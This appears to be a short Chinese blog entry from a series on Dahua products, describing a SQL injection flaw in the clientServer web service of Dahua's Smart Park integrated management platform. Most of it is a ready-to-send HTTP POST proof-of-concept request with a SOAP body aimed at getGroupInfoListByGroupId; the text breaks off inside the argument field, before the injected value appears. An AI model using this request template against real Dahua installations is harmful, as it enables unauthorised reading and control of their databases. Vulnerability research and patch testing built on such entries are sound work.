![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a27caee0eb8e4b1a945e8f9525e69cbd.png)
大华dahua系列
大华智慧园区综合管理平台clientServer SQL注入
https://mp.weixin.qq.com/s/QK-7uNzDToA-FbrY60GDoA
大华智慧园区综合管理平台是一个集成化、智能化的园区管理系统。智慧园区综合管理平台clientServer文件存在SQL注入漏洞,攻击者利用该漏洞执行恶意SQL语句,获取数据库中的数据,控制整个数据库服务器。
POST /portal/services/clientServer HTTP/1.1
Host: {
{
Hostname}}
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 431
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<cli:getGroupInfoListByGroupId>
<!--type: string-->
<arg0>